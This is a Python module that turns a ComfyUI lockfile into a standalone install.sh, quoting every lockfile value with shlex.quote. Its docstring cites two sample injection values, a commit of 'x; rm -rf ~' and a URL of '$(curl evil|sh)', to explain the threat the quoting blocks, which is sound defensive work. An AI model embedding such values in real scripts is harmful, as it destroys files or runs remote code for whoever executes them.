"""Render a lockfile as a standalone POSIX ``install.sh``.

Clones each pinned custom node at its commit and downloads each model (curl with
a wget fallback), verifying SHA256 via ``sha256sum``. No Python is needed to run
the output -- it is a portable bootstrap for a locked ComfyUI environment.
"""

from __future__ import annotations

import shlex

from .. import __version__
from ..model import Lockfile


def _q(value: object) -> str:
    """POSIX-shell-quote an untrusted lockfile value before embedding it.

    A lockfile is shared, third-party input: its git URLs, commits, model URLs,
    paths and hashes are read verbatim with no validation (see ``model.from_dict``).
    The generated ``install.sh`` is meant to be *executed*, so embedding any of
    those values unquoted turns a malicious lock into arbitrary code execution on
    whoever runs the script -- e.g. a ``comfyui`` commit of ``x; rm -rf ~`` or a
    model url of ``$(curl evil|sh)`` would run. ``shlex.quote`` renders every value
    as a single inert argument (single-quoted, embedded quotes escaped), so git/
    curl/sha256sum only ever see data, never extra commands.
    """
    return shlex.quote(str(value))


def _node_name(url: str) -> str:
    seg = url.rstrip("/").replace("\\", "/").rstrip("/").split("/")[-1]
    return seg[:-4] if seg.endswith(".git") else seg


def to_shell(lock: Lockfile) -> str:
    out: list[str] = []
    out.append("#!/usr/bin/env bash")
    out.append(
        f"# Generated by ComfyLock {__version__} -- "
        "https://github.com/theot44240-tech/comfylock"
    )
    out.append("# Reproduce a locked ComfyUI environment. Run from your ComfyUI root.")
    out.append("set -euo pipefail")
    out.append("")
    out.append('ROOT="${1:-$(pwd)}"')
    out.append('cd "$ROOT"')
    out.append("")
    out.append("dl() { # dl URL DEST -- download with curl, falling back to wget")
    out.append('  url="$1"; dest="$2"; mkdir -p "$(dirname "$dest")"')
    out.append('  if command -v curl >/dev/null 2>&1; then')
    out.append('    curl -fL --retry 3 -o "$dest" "$url"')
    out.append('  else')
    out.append('    wget -O "$dest" "$url"')
    out.append('  fi')
    out.append("}")
    out.append("")

    if lock.comfyui:
        out.append("# Pin ComfyUI core to the locked commit")
        out.append(f"git fetch --all && git checkout {_q(lock.comfyui)}")
        out.append("")

    if lock.git_nodes:
        out.append("# Custom nodes (pinned commits)")
        out.append('mkdir -p custom_nodes && cd custom_nodes')
        for url, commit in sorted(lock.git_nodes.items()):
            name = _node_name(url)
            out.append(
                f"if [ ! -d {_q(name)} ]; then git clone {_q(url)} {_q(name)}; fi"
            )
            out.append(
                f"( cd {_q(name)} && git fetch --all && git checkout {_q(commit)} )"
            )
        out.append('cd "$ROOT"')
        out.append("")

    if lock.models:
        out.append("# Models")
        for m in sorted(lock.models, key=lambda m: m.name.lower()):
            dest = m.paths[0] if m.paths else f"models/checkpoints/{m.name}"
            sha = m.hash_of("SHA256")
            if not m.url:
                out.append(
                    "echo "
                    + _q(f"WARN: no download URL for {m.name}; "
                         f"place it at {dest} manually")
                )
                continue
            out.append(f"dl {_q(m.url)} {_q(dest)}")
            if sha:
                out.append(f"echo {_q(f'{sha}  {dest}')} | sha256sum -c -")
        out.append("")

    out.append('echo "ComfyLock: environment restored."')
    return "\n".join(out) + "\n"
